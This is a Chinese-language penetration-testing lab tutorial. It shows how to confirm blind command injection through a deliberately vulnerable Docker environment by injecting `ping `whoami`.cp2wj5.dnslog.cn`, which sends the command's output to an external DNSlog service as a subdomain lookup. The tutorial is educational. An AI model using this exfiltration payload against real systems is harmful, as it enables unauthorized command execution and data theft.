通過DNSLOG回顯驗證漏洞

前言

實際滲透測試中，有些漏洞因為沒有回顯導致無法準確判斷漏洞是否存在，可能導致滲透測試人員浪費大量精力在一個并不存在的漏洞上，因此為了驗證一些無回顯漏洞，可結合DNSlog平臺進行測試，本文使用的DNSlog平臺鏈接如下：//dnslog.cn/

原理

DNSlog檢測原理在此就不多贅述了，網上相關資料鋪天蓋地，此處引用一張FREEBUF的圖用以說明，此圖現在看不懂沒關系，當做完實驗后再返回查看本圖思維就會很清晰了。

環境搭建

1. 安裝Docker

接下來直接搭建靶場，進入實驗環境，本實驗使用Docker搭建漏洞環境，操作系統是windows 10，Docker Desktop提供了較為完善的圖形化操作界面，且兼容性隨著版本更新目前已經與linux下運行的Docker無區別，安裝方式見官網，安裝操作較為簡單，無腦下一步即可，安裝完成后需要重啟，接著按照說明一步步安裝其他必備環境，這里就不再細說了。

2.拉取鏡像

• 打開CMD/PowerShell運行以下命令：docker pull ge592555078/lkwa從倉庫拉取鏡像
• 接著打開Docker Desktop按照下圖操作運行剛才拉取的環境，并將80端口映射到本地的81端口。
• 

// 或者在命令行中直接輸入docker run -d -p 81:80 ge592555078/lkwa

• 此時訪問//localhost:81/應當出現apache的默認頁面，證明環境搭建完成：
• 

漏洞復現

由于主要學習dnslog的使用，我們就用環境中命令執行模塊復現。

1. 訪問//localhost:81/index.php此為漏洞環境的主頁
2. 左側選擇Bind RCE命令注入環境
3. 此時訪問dnslog平臺：//dnslog.cn/點擊頁面上Get SubDomain生成專屬子域名

1. 回到漏洞環境，在右側命令執行輸入框中輸入如下命令之后點擊submit按鈕提交執行。(whoami后應該銜接剛才生成的對應子域名)

ping `whoami`.cp2wj5.dnslog.cn

1. 再返回DNSlog平臺，點擊刷新解析記錄按鈕，可以發現whoami的執行結果已經拼接成四級域名了

至此為止試驗結束。

分析總結

存在無回顯漏洞的主機訪問DNSlog平臺就會留下DNS解析記錄，可以通過DNS解析記錄查看最終的執行結果，如示例中的語句：

ping `whoami`.cp2wj5.dnslog.cn
此語句實際上是：
ping www-data.yafjqc.dnslog.cn

包圍著whoami的符號是反單引號，是shift+~組合打出來的符號，表示執行命令的意思，那么最終ping的結果就是ping whoami執行后的主機名.隨機三級域名.dnslog.cn，解析的時候一層一層的迭代解析，最終指向dnslog.cn服務器上你的專屬三級域名，并附帶上執行結果(四級域名)，那么此時看dnslog服務器的DNS解析記錄即可查看whoami的執行結果，如果對DNS協議不清楚此時應先去學習DNS解析原理，不然此篇文章學習起來較為吃力。